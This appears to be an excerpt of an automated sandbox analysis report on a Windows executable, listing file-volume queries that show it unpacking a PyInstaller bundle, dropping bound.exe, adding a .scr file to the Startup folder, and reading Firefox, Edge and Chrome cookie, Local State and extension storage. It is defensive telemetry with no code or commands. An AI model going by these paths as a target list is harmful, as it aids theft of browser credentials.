Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\bound.blank VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\bound.blank VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ??? ? ?\System\Antivirus.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
